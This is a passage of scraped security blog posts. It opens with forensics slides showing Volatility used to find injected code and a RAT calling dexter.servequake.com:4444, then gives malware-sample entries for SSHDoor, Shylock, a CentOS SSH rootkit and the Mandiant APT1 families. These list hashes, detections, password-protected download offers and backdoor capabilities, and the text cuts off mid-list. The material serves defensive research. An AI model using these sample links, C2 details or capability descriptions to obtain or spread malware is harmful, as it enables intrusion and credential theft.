volatile memory [RAM] samples which offer an amazing visibility in the runtime
state of the system.
* You can easily identify running processes and their DLL, Virtual Address
Descriptor [VAD], System call tables [IDT, GDT, SSDT], environment variables,
network connections, open handles to kernel and executive objects, and so on.
========================
Memory Forensics
* It can even be used to dump LM and NTLM hashes, as well as LSA secrets…
========================
Memory Forensics
* Well, for French targets there is a little bug [because of accents]... You
will have to adapt a little bit the code:
========================
Memory Forensics
* But beside this, it is really efficient to track malcode. Let’s dig into a
real example…
========================
Memory Forensics
* Heavy malware may be digitally signed by a trusted CA.
========================
Memory Forensics
* And may be really appear benign to your users.
========================
Memory Forensics
* Here it was an obfuscated .Net based Dropper.
========================
Memory Forensics
* Even if you manually find the embedded payload, nearly everything is packed
to disturb Reverse Engineers.
========================
Memory Forensics
* The only one unencrypted payload was a kind of anti-restoring feature, which
basically hooks specific API to prevent system administrators to remove the
malware [e.g. by killing his task manager].
* And then? What’s next? We could spend lots of time in a Reverse Engineering
phase, or analyse its behaviour in a sandbox [if the code doesn’t detect it]…
* …And we can simply see what’s happen in memory.
========================
Memory Forensics
* Just infect voluntarily your VM or your lab workstation.
* And use one of the good existing tools to dump the whole memory:
* Memory from Mandiant
* FTK Imager from AccessData
* FastDump from HB Gary
* DumpIt and Win32dd / Win64dd from Moonsols
* And of course your favourite FireWire interface
* Before using Volatility to dissect this memory dump.
========================
Memory Forensics
* Let’s begin to get basic information on our dump file.
========================
Memory Forensics
* The PSLIST command quickly show processes.
========================
Memory Forensics
* You can arrange them by tree view.
========================
Memory Forensics
* This process list can be quickly obtained by parsing a Kernel double chained
list. Nevertheless, this list can be altered by malware, such as Rootkits, which
therefore hide themselves from common system tools.
* A deep research can then be achieved, which consist in parsing the whole
memory dump to locate EPROCESS structures. These Kernel structures do exist for
each process, no matter what the double chained list [known as Process Control
Block] is.
* A process listed in a PSCAN and not in a PSLIST often indicate a threat
[mostly permitted via API Hooking].
========================
Memory Forensics
* The PSCAN is longer but may reveal hidden code.
========================
Memory Forensics
* Similarly, you can find processes which attempt to hide themselves on
various process listings through the PSXVIEW command:
========================
Memory Forensics
* Several Volatility commands works in this way and offer a SCAN variant to
try to recognize specific structures in memory, thus revealing hidden sockets
and connections for example.
* For sure you may have [often quickly identified] false positives, as some
process may gave been legitimately closed for example, thus letting some orphan
EPROCESS data structures in RAM.
* Nevertheless, some process may still be really running, and therefore
instantaneously reveal a serious security issue.
========================
Memory Forensics
* Established and recently closed connexions are also quickly revealed.
========================
Memory Forensics
* And you can also easily explore the registry, which is widely used by
malcode writers for various purpose [e.g. to permit their code to survive
reboot].
========================
Memory Forensics
* As well querying loaded drivers [often used by Rootkits].
========================
Memory Forensics
* You can even parse loaded libraries to detect API Hooking, also widely used
by Rootkits. Here a trampoline has been placed in the wbemcomm DLL [to hook
certain WMI queries].
========================
Memory Forensics
* You can extract suspicious file [through PID or offset] from the memory dump
to carry out further investigation.
========================
Memory Forensics
* And quickly identify a Key Logger.
========================
Memory Forensics
* In fact, you can enumerate all opened files and even loaded DLL within a
specific process… And drop them back on disk for investigation.
========================
Memory Forensics
* The dumped process may not be runable, but would still offer you a quite
easy to understand code [at least you don't have anymore to unpack it]. For
example: strings dumpedfile | egrep -i 'http|ftp|irc|\.exe'
* Even more powerful, you can rely on the MALFIND command to perform advanced
search using Regex, Unicode or ANSI strings...
* And most importantly, it permits to quickly find hidden or injected code
through the VAD tree inspection [very useful in case of DLL which may have been
unlinked from the LDR lists by the malcode loader in order to avoid its
detection].
========================
Memory Forensics
* Here the MALFIND command reveals that an arbitrary code was injected into
the CRSS.exe system process.
========================
Memory Forensics
* We can quick parse MALFIND results to bring out running processes which were
infected by such code injection.
========================
Memory Forensics
* Even powerful rootkits quickly draw your attention.
========================
Memory Forensics
* We can also use the Yara malware identification feature to directly scan for
patterns inside a PID or within a specific memory segment. Here we see that an
injected code inside the SVCHOST process established a connection to
dexter.servequake.com:4444 via HTTP and download the 1234567890.functions
resource.
========================
Memory Forensics
* For sure, the RAT payload is encrypted, but in a few minutes you identified
the threat and dig quite deeply into the real problem.
========================
Memory Forensics
* You can now extract the guilty binary code along with the related memory
segments and begin a classical malware analysis.
========================
Memory Forensics
* And if you like high-level view for your incident report, why not extend
Volatility with Graphviz to make something more visual?
========================
Memory Forensics
* That’s it. I hope I have piqued your interest with one of the most important
Forensics innovations of those last few years. The whole demo is attached here.
* To learn more: SANS Forensics 610 Training Course [GREM]
https://www.volatilesystems.com/default/volatility
http://www.microsoft.com/whdc/system/platform/firmware/PECOFF.mspx
http://www.ualberta.ca/CNS/RESEARCH/LinuxClusters/mem.html
http://www.tenouk.com/visualcplusmfc/visualcplusmfc20.html
========================
Table of contents
0x00 - About me
0x01 - About this conference
0x02 - Memory introduction
0x03 - Memory manipulation from an offensive angle
0x04 - Memory manipulation from a defensive angle
0x05 - Conclusion
========================
Conclusion
* I hope I have achieved my goal of opening the doors to a fascinating world
which could easily allow security analysts to save lots of time during their
recurrent duties…
* …And that you will see your own system [and the ones you asses] from a
different angle.
* …And that you will now have the reflex of dumping the whole memory in case
of incident.
* …And that you will reconsider security when the physical aspect in
concerned. :-]
JAN 2013 - LINUX SSHDOOR - SAMPLE
February 16, 2013, 6:13 pm
Next Jan 2013 Shylock (skype version) sample
Previous Manipulating Memory for Fun and Profit by Frédéric Bourla - High-Tech
Bridge
0
0
Image may be NSFW.
Clik here to view.
Just a few accumulated samples here found and shared by others. This one is for
Linux SSHDoor malware, which can steal your SSH passwords. ESET covered that in
detail in Linux/SSHDoor.A Backdoored SSH daemon that steals passwords ( 24 JAN
2013)
The related Linux.Chapro.A sample was posted earlier this year as well
Download
Image may be NSFW.
Clik here to view.Download. Email me if you need the password
Automatic Scans
https://www.virustotal.com/en/file/ebfd9354ed83635ed38bd117b375903f9984a18780ef86dbf7a642fc6584271c/analysis/1361067116/
SHA256:ebfd9354ed83635ed38bd117b375903f9984a18780ef86dbf7a642fc6584271c
SHA1:cb7a464aa8d58f26f6561c32ef4a1464c583a7ca
MD5:90dc9de5f93b8cc2d70a1be37acea23a
File size:469.9 KB ( 481200 bytes )
File name:90DC9DE5F93B8CC2D70A1BE37ACEA23A
File type:ELF
Detection ratio: 22 / 46
Analysis date: 2013-02-17 02:11:56 UTC ( 0 minutes ago )
Avast ELF:SSHDoor-A [Trj] 20130217
AVG BackDoor.Generic_c.FDN 20130216
ClamAV UNIX.Trojan.SSHDoor 20130217
Comodo UnclassifiedMalware 20130217
DrWeb Linux.BackDoor.Ssh 20130215
eSafe Win32.Trojan 20130211
ESET-NOD32 Linux/SSHDoor.A 20130216
F-Secure Backdoor:Linux/SSHDoor.A 20130217
Fortinet Linux/SSh.M!tr.bdr 20130217
GData ELF:SSHDoor-A 20130217
Ikarus Backdoor.Linux.SSh 20130216
Jiangmin Backdoor/Linux.gu 20130216
Kaspersky Backdoor.Linux.SSh.m 20130216
Microsoft Backdoor:Linux/SSHDoor.A 20130217
Norman SSHDoor.A 20130215
PCTools Malware.Linux-SSHDoor 20130217
Symantec Linux.SSHDoor 20130216
TrendMicro ELF_SSHDOOR.A 20130217
TrendMicro-HouseCall ELF_SSHDOOR.A 20130217
JAN 2013 SHYLOCK (SKYPE VERSION) SAMPLE
February 16, 2013, 7:15 pm
Next Linux/CentOS SSHd Spam Exploit — libkeyutils.so.1.9 - sample
Previous Jan 2013 - Linux SSHDoor - sample
0
0
Image may be NSFW.
Clik here to view.
In January 2013, Iurii Khvyl and Peter Kruse from CSIS posted analysis of
Shylock variant capable of spreading through Skype.
You can read their research here Shylock calling Skype. The sample is below
Download
Image may be NSFW.
Clik here to view.Download. Email me if you need the password
Sample credit: anonymous
Automatic scans
https://www.virustotal.com/en/file/4bd97130a89c2f9080259d8e87d8d713a23fd0e4336eabb0bf47a44d700ec842/analysis/
SHA256:4bd97130a89c2f9080259d8e87d8d713a23fd0e4336eabb0bf47a44d700ec842
SHA1:b87948722e04fa3edda45303d20c745a6301e567
MD5:8fbeb78b06985c3188562e2f1b82d57d
File size:278.0 KB ( 284672 bytes )
File name:4bd97130a89c2f9080259d8e87d8d713a23fd0e4336eabb0bf47a44d700ec842
File type:Win32 DLL
Tags:pedll
Detection ratio: 33 / 46
Analysis date: 2013-02-05 19:05:29 UTC ( 1 week, 4 days ago )
31 91
AhnLab-V3 Win-Trojan/Caphaw.284672 20130205
AntiVir TR/Skyspy.AJ 20130205
Avast Win32:Shylock-A [Trj] 20130205
AVG Ransomer.BKE 20130205
BitDefender Trojan.Generic.8640212 20130205
CAT-QuickHeal Backdoor.Caphaw 20130205
ClamAV Win.Trojan.Shylock 20130205
Comodo UnclassifiedMalware 20130205
eSafe Win32.Trojan 20130204
ESET-NOD32 Win32/Caphaw.M 20130205
F-Secure Trojan:W32/Agent.DUIE 20130205
Fortinet W32/Shylock.A!tr 20130205
GData Trojan.Generic.8640212 20130205
Ikarus Trojan-Spy.Agent 20130205
Kaspersky Trojan.Win32.Agentb.hxk 20130204
Malwarebytes Trojan.Shylock 20130205
McAfee RDN/Generic.dx!i 20130205
McAfee-GW-Edition RDN/Generic.dx!i 20130205
Microsoft Backdoor:Win32/Caphaw.N 20130205
MicroWorld-eScan Trojan.Generic.8640212 20130205
NANO-Antivirus Trojan.Win32.Caphaw.bevzou 20130205
Norman Shylock.C 20130205
nProtect Trojan.Generic.8640212 20130205
Panda Trj/CI.A 20130205
PCTools Trojan.Generic 20130205
Rising Backdoor.Caphaw!4ED7 20130205
Sophos Troj/Shype-A 20130205
Symantec Trojan Horse 20130205
TheHacker Trojan/Caphaw.gen 20130205
TrendMicro WORM_KEPSY.A 20130205
TrendMicro-HouseCall WORM_KEPSY.A 20130205
VIPRE Trojan.Win32.Generic!BT 20130205
ViRobot Backdoor.Win32.S.Shylock.284672 20130205
LINUX/CENTOS SSHD SPAM EXPLOIT — LIBKEYUTILS.SO.1.9 - SAMPLE
February 20, 2013, 1:39 pm
Next Mandiant APT1 samples categorized by malware families
Previous Jan 2013 Shylock (skype version) sample
0
0
Image may be NSFW.
Clik here to view.
Someone shared a sample of the Linux rootkit affecting servers running
CloudLinux, CentOS & cPanel.
Here are the links:
* Feb 20-18 - Webhostingtalk SSHD Rootkit Rolling around
* Feb 18, 2013 0day Linux/CentOS SSHd Spam Exploit — libkeyutils.so.1.9
http://blog.solidshellsecurity.com/
* Feb 8, 2013 SSHD Spam Rootkit /lib64/libkeyutils.so.1.9
Download
Image may be NSFW.
Clik here to view.Download. Email me if you need the password
Sample credit: anonymous
Automatic scans
https://www.virustotal.com/en/file/afbef5352942dde22e5cfa802c057917fccb17623f3e8ead165fd17371d851f3/analysis/
SHA256:afbef5352942dde22e5cfa802c057917fccb17623f3e8ead165fd17371d851f3
SHA1:471ee431030332dd636b8af24a428556ee72df37
MD5:ecea5cc15532ffac4b8159bf860c63c1
File size:27.7 KB ( 28352 bytes )
FIRST SEEN BY VIRUSTOTAL
2013-02-19 14:14:30 UTC ( 1 day, 7 hours ago )
LAST SEEN BY VIRUSTOTAL
2013-02-20 18:03:38 UTC ( 3 hours, 57 minutes ago )
FILE NAMES (MAX. 25)
1. vti-rescan
2. libkeyutils.so.1.9
File type:ELF
Detection ratio: 3 / 46
Analysis date: 2013-02-20 18:03:38 UTC
AVG Patched_c.NCO 20130220
DrWeb Linux.Sshdkit.1 20130220
ESET-NOD32 Linux/SSHDoor.B 20130220
MANDIANT APT1 SAMPLES CATEGORIZED BY MALWARE FAMILIES
March 3, 2013, 8:46 pm
Next DarkSeoul - Jokra - MBR wiper samples
Previous Linux/CentOS SSHd Spam Exploit — libkeyutils.so.1.9 - sample
0
0
Image may be NSFW.
Clik here to view.These are the samples described in the Mandiant Report APT1,
in the Indicators of Compromise (IOCs). Each file is named according to the
malware family, so you can run your own detection and signature tools to see how
your naming convention corresponds to the one used by Mandiant.
You can use these binaries to develop signatures, compare to your samples, or
study the behavior and evolution of APT1.
I added Contagio samples in several families as well.
The list of binaries and their names, as well as malware families descriptions
are provided below for your convenience.
Download
Image may be NSFW.
Clik here to view.Download Mandiant report samples. Email me if you need the
password
Download Contagio samples (Bangat, Mapiget, Kurton, Bicuit, Letsgo)
Download additional samples for GCal, GDocupload, Manitsme
Sample list and information
Below descirptions are from Mandiant
IOC http://intelreport.mandiant.com/Mandiant_APT1_Report_Appendix.zip
Image may be NSFW.
Clik here to view.
1. AURIGA
The AURIGA malware family shares a large amount of functionality with the BANGAT
backdoor. The malware family contains functionality for keystroke logging,
creating and killing processes, performing file system and registry
modifications, spawning interactive command shells, performing process
injection, logging off the current user or shutting down the local machine. The
AURIGA malware contains a driver component which is used to inject the malware
DLL into other processes. This driver can also perform process and IP
connection hiding. The malware family will create a copy of cmd.exe to perform
its C2 activity, and replace the "Microsoft corp" strings in the cmd.exe binary
with different values. The malware family typically maintains persistence
through installing itself as a service.
> AURIGA_sample_6B31344B40E2AF9C9EE3BA707558C14E
> AURIGA_sample_CDCD3A09EE99CFF9A58EFEA5CCBE2BED
2. BANGAT
The BANGAT malware family shares a large amount of functionality with the AURIGA
backdoor. The malware family contains functionality for keylogging, creating
and killing processes, performing filesystem and registry modifications,
spawning interactive command shells, performing process injection, logging off
the current user or shutting down the local machine. In addition, the malware
also implements a custom VNC like protocol which sends screenshots of the
desktop to the C2 server and accepts keyboard and mouse input. The malware
communicates to its C2 servers using SSL, with self signed SSL certificates.
The malware family will create a copy of cmd.exe to perform its C2 activity,
and replace the "Microsoft corp" strings in the cmd.exe binary with different
values. The malware family typically maintains persistence through installing
itself as a service.
> BANGAT_sample_4C6BDDCCA2695D6202DF38708E14FC7E
> BANGAT_sample_8E8622C393D7E832D39E620EAD5D3B49
> BANGAT_sample_468FF2C12CFFC7E5B2FE0EE6BB3B239E
> BANGAT_sample_727A6800991EEAD454E53E8AF164A99C
> BANGAT_sample_BD8B082B7711BC980252F988BB0CA936
> BANGAT_sample_DB05DF0498B59B42A8E493CF3C10C578
> BANGAT_sample_E1B6940985A23E5639450F8391820655
> BANGAT_sample_EF8E0FB20E7228C7492CCDC59D87C690
Contagio samples for Bangat
Circa 2009-2010
995B44EF8460836D9091A8B361FDE489_rasauto32.dll
F10D145684BA6C71CA2D2F7EB0D89343_rasauto32.dll
43CE605B2584C27064FEBB0474A787A4_irmon32.dll
1966B265272E1660E6F340B19A7E5567_irmon32.dll
423A30C077B12354A4A5C31D4DE99689_irmon32.dll
80CA8B948409138BE40FFBC5D6D95EF1_rasauto16.dll
15138604260B1D27F92BF1EC6468B326_rasauto16.dll
616B0F00DE54D7501CEEE18823F72103_rasauto16.dll
C75D351D86DE26718A3881F62FDDDE99_irmon32.dll
E66DD357A6DFA6EBD15358E565E8F00F_irmon32.dll
0F77AF7FA673F5B3D36B926576002A1C_winhlp32.exe
3. BISCUIT
BISCUIT provides attackers with full access to an infected host. BISCUIT
capabilities include launching an interactive command shell, enumerating servers
on a Windows network, enumerating and manipulating process, and transferring
files. BISCUIT communicates using a custom protocol, which is then encrypted
using SSL. Once installed BISCUIT will attempt to beacon to its command/control
servers approximately every 10 or 30 minutes. It will beacon its primary server
first, followed by a secondary server. All communication is encrypted with SSL
(OpenSSL 0.9.8i).
> BISCUIT_sample_5A728CB9CE56763DCCB32B5298D0F050
> BISCUIT_sample_5D8129BE965FAB8115ECA34FC84BD7F0
> BISCUIT_sample_7CB055AC3ACBF53E07E20B65EC9126A1
> BISCUIT_sample_12F25CE81596AEB19E75CC7EF08F3A38
> BISCUIT_sample_43B844C35E1A933E9214588BE81CE772
> BISCUIT_sample_70A55FDC712C6E31E013E6B5D412B0D6
> BISCUIT_sample_268EEF019BF65B2987E945AFAF29643F
> BISCUIT_sample_15901DDBCCC5E9E0579FC5B42F754FE8
> BISCUIT_sample_034374DB2D35CF9DA6558F54CEC8A455
> BISCUIT_sample_DA383CC098A5EA8FBB87643611E4BFB6
Contagio samples for
03B3CCEB253FD782590CF0EFAFD49D5F_AcroRD32.exe
8AA320A3D34CF89EF63BF801DD497490_qmqrproxy.dll
4. BOUNCER
BOUNCER will load an extracted DLL into memory, and then will call the DLL's
dump export. The dump export is called with the parameters passed via the
command line to the BOUNCER executable. It requires at least two arguments, the
IP and port to send the password dump information. It can accept at most five
arguments, including a proxy IP, port and an x.509 key for SSL authentication.
The DLL backdoor has the capability to execute arbitrary commands, collect
database and server information, brute force SQL login credentials, launch
arbitrary programs, create processes and threads, delete files, and redirect
network traffic.
> BOUNCER_sample_6EBD05A02459D3B22A9D4A79B8626BF1
> BOUNCER_sample_57353ECBAECE29ECAF8025231EB930E3
> BOUNCER_sample_CF038194F0FE222F31EC24CB80941BB1
> BOUNCER_sample_D2F1BE7E10ED39AA8BC0F7F671D824D2
> BOUNCER_sample_F90DA15F862BB8452FC51D3F0DBB3373
5. CALENDAR
This family of malware uses Google Calendar to retrieve commands and send
results. It retrieves event feeds associated with Google Calendar, where each
event contains commands from the attacker for the malware to perform. Results
are posted back to the event feed. The malware authenticates with Google using
the hard coded email address and passwords. The malware uses the deprecated
ClientLogin authentication API from Google. The malware is registered as a
service dll as a persistence mechanism. Artifacts of this may be found in the
registry.
GCAL_sample_72d4be67abeaa6ab3827784317b1b7e9
6. COMBOS
The COMBOS malware family is an HTTP based backdoor. The backdoor is capable of
file upload, file download, spawning a interactive reverse shell, and
terminating its own process. The backdoor may decrypt stored Internet Explorer
credentials from the local system and transmit the credentials to the C2 server.
The COMBOS malware family does not have any persistence mechanisms built into
itself.
> COMBOS_sample_1E3719BBF854417384A3768E4326584BCOMBOS_sample_
> EC1E62EF73D844C6C845ACDD4C1F9CE7
> COMBOS_sample_FA14D823A5D1854131DB0DC9EEF27022
7 COOKIEBAG aka
TROJAN.COOKIES http://www.cyberengineeringservices.com/trojan-cookies/
his family of malware is a backdoor capable of file upload and download as well
as providing remote interactive shell access to the compromised machine.
Communication with the Command & Control (C2) servers uses a combination of
single-byte XOR and Base64 encoded data in the Cookie and Set-Cookie HTTP header
fields. Communication with the C2 servers is over port 80. Some variants install
a registry key as means of a persistence mechanism. The hardcoded strings cited
include a string of a command in common with several other APT1 families.
> COOKIEBAG_sample_0C28AD34F90950BC784339EC9F50D288
> COOKIEBAG_sample_321D75C9990408DB812E5A248A74F8C8
> COOKIEBAG_sample_543E03CC5872E9ED870B2D64363F518B
> COOKIEBAG_sample_989B797C2A63FBFC8E1C6E8A8CCD6204
> COOKIEBAG_sample_57326CD78A56D26E349BBD4BCC5B9FA2
> COOKIEBAG_sample_DB2580F5675F04716481B24BB7AF468E
> COOKIEBAG_sample_F3611C5C793F521F7FF2A69C22D4174E
7 DAIRY
Members of this malware family are backdoors that provide file downloading,
process listing, process killing, and reverse shell capabilities. This malware
may also add itself to the Authorized Applications list for the Windows
Firewall.
> DAIRY_sample_995442F722CC037885335340FC297EA0
8. GETMAIL
Members of this family of malware are utilities designed to extract email
messages and attachments from Outlook PST files. One part of this utility set is
an executable, one is a dll. The malware may create a registry artifact related
to the executable.
> GETMAIL_sample_909BEF6DB8D33854E983EBCCDD71419F
> GETMAIL_sample_E81DB0198D2A63C4CCFC33F58FCB821E
> GETMAIL_sample_E212AAF642D73A2E4A885F12EEA86C58
9. GDOCUPLOAD
This family of malware is a utility designed to upload files to Google Docs.
Nearly all communications are with docs.google.com are SSL encrypted. The
malware does not use Google's published API to interact with their services. The
malware does not currently work with Google Docs. It does not detect HTTP 302
redirections and will get caught in an infinite loop attempting to parse results
from Google that are not present.
> GDOCUPLOAD-sample_232d1be2d8cbbd1cf57494a934628504
10 GLOOXMAIL - aka
TROJAN.GTALK http://www.cyberengineeringservices.com/trojan-gtalk/
GLOOXMAIL communicates with Google's Jabber/XMPP servers and authenticates with
a hard-coded username and password. The malware can accept commands over XMPP
that includes file upload and download, provide a remote shell, sending process
listings, and terminating specified processes. The malware makes extensive use
of the open source gloox library (http://camaya.net/gloox/, version 0.9.9.12) to
communicate using the Jabber/XMPP protocol. All communications with the Google
XMPP server are encrypted.
> GLOOXMAIL_sample_3DE1BD0F2107198931177B2B23877DF4
> GLOOXMAIL_sample_15A33F8FE11B94BDD38BFF651F6A5CD1
11 GOGGLES - AKA TROJAN.FOXY
http://www.cyberengineeringservices.com/trojan-foxy-des/
A family of downloader malware, that retrieves an encoded payload from a fixed
location, usually in the form of a file with the .jpg extension. Some variants
have just an .exe that acts as a downloader, others have an .exe launcher that
runs as a service and then loads an associated .dll of the same name that acts
as the downloader. This IOC is targeted at the downloaders only. After
downloading the file, the malware decodes the downloaded payload into an .exe
file and launches it. The malware usually stages the files it uses in the %TEMP%
directory or the %WINDIR%\Temp directory.
> GOGGLES_sample_09D372E4259980AC95FDADF1846578D9
> GOGGLES_sample_57F98D16AC439A11012860F88DB21831
> GOGGLES_sample_51326BF40DA5A5357A143DD9A6E6A11C
> GOGGLES_sample_A5B581C0600815B1112CA2FED578928B
> GOGGLES_sample_BCB087F69792B69494A3EDAD51A842BB
> GOGGLES_sample_BF80DBF969B73790253F683CD723FD71
> GOGGLES_sample_DB50416D9E67F4982E89E0FFB0ADE6F3
12 GREENCAT
Members of this family are full featured backdoors that communicates with a
Web-based Command & Control (C2) server over SSL. Features include interactive
shell, gathering system info, uploading and downloading files, and creating and
killing processes, Malware in this family usually communicates with a hard-coded
domain using SSL on port 443. Some members of this family rely on launchers to
establish persistence mechanism for them. Others contains functionality that
allows it to install itself, replacing an existing Windows service, and
uninstall itself. Several variants use %SystemRoot%\Tasks or %WinDir%\Tasks as
working directories, additional malware artifacts may be found there.
> GREENCAT_sample_0C5E9F564115BFCBEE66377A829DE55F
> GREENCAT_sample_1F92FF8711716CA795FBD81C477E45F5
> GREENCAT_sample_3E6ED3EE47BCE9946E2541332CB34C69
> GREENCAT_sample_3E69945E5865CCC861F69B24BC1166B6
> GREENCAT_sample_5AEAA53340A281074FCB539967438E3F
> GREENCAT_sample_6D2320AF561B2315C1241E3EFD86067F
> GREENCAT_sample_30E78D186B27D2023A2A7319BB679C3F
> GREENCAT_sample_36C0D3F109AEDE4D76B05431F8A64F9E
> GREENCAT_sample_55FB1409170C91740359D1D96364F17B
> GREENCAT_sample_57E79F7DF13C0CB01910D0C688FCD296
> GREENCAT_sample_120C2E085992FF59A21BA401EC29FEC9_different
> GREENCAT_sample_390D1F2A620912104F53C034C8AEF14B
> GREENCAT_sample_871CC547FEB9DBEC0285321068E392B8
> GREENCAT_sample_7388D67561D0A7989202AD4D37EFF24F
> GREENCAT_sample_A99E06E2F90DB4E506EF1347A8774DD5
> GREENCAT_sample_A565682D8A13A5719977223E0D9C7AA4
> GREENCAT_sample_AB208F0B517BA9850F1551C9555B5313
> GREENCAT_sample_B3BC979D8DE3BE09728C5DE1A0297C4B
> GREENCAT_sample_B5E9CE72771217680EFAEECFAFE3DA3F
> GREENCAT_sample_B8F61242E28F2EDF6CB1BE8781438491
> GREENCAT_sample_BA0C4D3DBF07D407211B5828405A9B91
> GREENCAT_sample_C044715C2626AB515F6C85A21C47C7DD
> GREENCAT_sample_E54CE5F0112C9FDFE86DB17E85A5E2C5
> GREENCAT_sample_E83F60FB0E0396EA309FAF0AED64E53F
> GREENCAT_sample_F4ED3B7A8A58453052DB4B5BE3707342
> GREENCAT_sample_FAB6B0B33D59F393E142000F128A9652
13. HACKFASE
This family of malware is a backdoor that provides reverse shell, process
creation, system statistics collection, process enumeration, and process
termination capabilities.
This family is designed to be a service DLL and does not contain an installation
mechanism.
It usually communicates over port 443. Some variants use their own encryption,
others use SSL.
> HACKFASE_sample_0D0240672A314A7547D328F824642DA8
> HACKFASE_sample_1A0C7E61BCC50D57B7BCF9D9AF691DE5
> HACKFASE_sample_9E860622FEE66074DFE81DCFCC40C4E2
> HACKFASE_sample_17199DDAC616938F383A0339F416C890
> HACKFASE_sample_BCBDEF1678049378BE04719ED29078D2
14. HELAUTO
This family of malware is designed to operate as a service and provides remote
command execution and file transfer capabilities to a fixed IP address or domain
name. All communication with the C2 server happens over port 443 using SSL.
This family can be installed as a service DLL. Some variants allow for
uninstallation.
> HELAUTO_sample_47E7F92419EB4B98FF4124C3CA11B738
> HELAUTO_sample_DA6B0EE7EC735029D1FF4FA863A71DE8
15. KURTON
This family of malware is a backdoor that tunnels its connection through a
preconfigured proxy. The malware communicates with a remote command and control
server over HTTPS via the proxy. The malware installs itself as a Windows
service with a service name supplied by the attacker but defaults to IPRIP if no
service name is provided during install.
No Mandiant samples available.
These are Contagio samples dated 2009
57C69FECFECDCB5288687DF2AC96E44F_iprinp.dll
7C136A9E8D94BF117288D9B5388019D6_iprinp.dll
82C39E6979022E57B93B719793B39A30_iprinp.dll
A327B9D97CA479B89297F438F87816A0_iprinp.dll
A6C1595BD7B1A85C42FBD674460DC35D_iprinp.dll
15. LIGHTBOLT
LIGHTBOLT is a utility with the ability to perform HTTP GET requests for a list
of user-specified URLs. The responses of the HTTP requests are then saved as
MHTML files, which are added to encrypted RAR files. LIGHTBOLT has the ability
to use software certificates for authentication.
> LIGHTBOLT_sample_2E86A9862257A0CF723CEEF3868A1A12
16 LIGHTDART
LIGHTDART is a tool used to access a pre-configured web page that hosts an
interface to query a database or data set. The tool then downloads the results
of a query against that web page to an encrypted RAR file. This RAR file (1.rar)
is renamed and uploaded to an attacker controlled FTP server, or uploaded via an
HTTP POST with a .jpg extension. The malware will execute this search once a
day. The target webpage usually contains information useful to the attacker,
which is updated on a regular basis. Examples of targeted information include
weather information or ship coordinates.
No samples
17. LONGRUN
LONGRUN is a backdoor designed to communicate with a hard-coded IP address and
provide the attackers with a custom interactive shell. It supports file uploads
and downloads, and executing arbitrary commands on the compromised machine.
When LONGRUN executes, it first loads configuration data stored as an
obfuscated string inside the PE resource section. The distinctive string
thequickbrownfxjmpsvalzydg is used as part of the input to the decoding
algorithm. When the configuration data string is decoded it is parsed and
treated as an IP and port number. The malware then connects to the host and
begins interacting with it over a custom protocol.
No samples
18. MANITSME
This family of malware will beacon out at random intervals to the remote
attacker. The attacker can run programs, execute arbitrary commands, and easily
upload and download files. This IOC looks for both the dropper file and the
backdoor.
> MANITSME_sample_e97ebb5b2050b86999c55797c2348ba7
19. MAPIGET as seen
here http://contagiodump.blogspot.com/2010/06/these-days-i-see-spike-in-number-of.html
This malware utility is a set of two files that operate in conjunction to
extract email messages and attachments from an Exchange server. In order to
operate successfully, these programs require authentication credentials for a
user on the Exchange server, and must be run from a machine joined to the domain
that has Microsoft Outlook installed (or equivalent software that provides the
Microsoft 'Messaging API' (MAPI) service).
> MAPIGET_sample_C627E595C9EC6DC2199447AEAB59AC03
> MAPIGET_sample_F3C6C797EF80787E6CBEEAA77496A3CB
Contagio samples for MAPIGET
09E25BB934D8523FCCD27B86FBF4F8CE_m.exe
C57902ACE7FF4173AE41F1292EA85E2A_MAPI.exe
20. MINIASP
This family of malware consists of backdoors that attempt to fetch encoded
commands over HTTP. The malware is capable of downloading a file, downloading
and executing a file, executing arbitrary shell commands, or sleeping a
specified interval.
> MINIASP_77FBFED235D6062212A3E43211A5706E
> MINIASP_81B03CBCFC4B9D090CD8F5E5DA816895
> MINIASP_E476E4A24F8B4FF4C8A0B260AA35FC9F
21 NEWSREELS
The NEWSREELS malware family is an HTTP based backdoor. When first started,
NEWSREELS decodes two strings from its resources section. These strings are both
used as C2 channels, one URL is used as a beacon URL (transmitting) and the
second URL is used to get commands (receiving). The NEWSREELS malware family is
capable of performing file uploads, downloads, creating processes or creating an
interactive reverse shell.
> NEWSREELS_sample_02C65973B6018F5D473D701B3E7508B2
> NEWSREELS_sample_2C49F47C98203B110799AB622265F4EF
> NEWSREELS_sample_270D42F292105951EE81E4085EA45054
> NEWSREELS_sample_0496E3B17CF40C45F495188A368C203A
> NEWSREELS_sample_523F56515221161579EE6090C962E5B1
> NEWSREELS_sample_933B11BC4799F8D9F65466FB2E3EA659
> NEWSREELS_sample_A2CD1189860B9BA214421AAB86ECBC8A
> NEWSREELS_sample_A639F598D4C0B9AA7A4691D05F27D977
> NEWSREELS_sample_AF2F7B070245C90BD2A0A0845314173A
> NEWSREELS_sample_B8277CCE81E0A372BC35D33A0C9483C2
> NEWSREELS_sample_BAABD9B76BFF84ED27FD432CFC6DF241
> NEWSREELS_sample_D4C7F1F80883412F9796F1270ACCFF50
> NEWSREELS_sample_D271AE0F4E9230AF3B61EAFE7F671FDE
> NEWSREELS_sample_EF6C375E3E6930E2B50E1E97FE6FBCC9
22. SEASALT
The SEASALT malware family communicates via a custom binary protocol. It is
capable of gathering some basic system information, file system manipulation,
file upload and download, process creation and termination, and spawning an
interactive reverse shell. The malware maintains persistence by installing
itself as a service.
> SEASALT_sample_5E0DF5B28A349D46AC8CC7D9E5E61A96
> SEASALT_sample_F0726AADCF5D66DAF528F79BA8507113
23. STARSYPOUND
STARSYPOUND provides an interactive remote shell over an obfuscated
communications channel. When it is first run, it loads a string (from the
executable PE resource section) containing the beacon IP address and port. The
malware sends the beacon string "*(SY)# <HOSTNAME>" to the remote system, where
<HOSTNAME> is the hostname of the victim system. The remote host responds with
a packet that also begins with the string "*(SY)# cmd". This causes the malware
to launch a new cmd.exe child process. Further communications are forwarded to
the cmd.exe child process to execute. The commands sent to the shell and their
responses are obfuscated when sent over the network.
> STARSYPOUND_sample_2BA0D0083976A5C1E3315413CDCFFCD2STARSYPOUND_sample_2DD892986B2249B5214639ECC8AC0223STARSYPOUND_sample_8B75BCBFF174C25A0161F30758509A44STARSYPOUND_sample_9EA3C16194CE354C244C1B74C46CD92ESTARSYPOUND_sample_6576C196385407B0F7F4B1B537D88983STARSYPOUND_sample_C0A33A1B472A8C16123FD696A5CE5EBBSTARSYPOUND_sample_CA6FE7A1315AF5AFEAC2961460A80569STARSYPOUND_sample_D9FBF759F527AF373E34673DC3ACA462STARSYPOUND_sample_EC8AA67B05407C01094184C33D2B5A44
24. SWORD
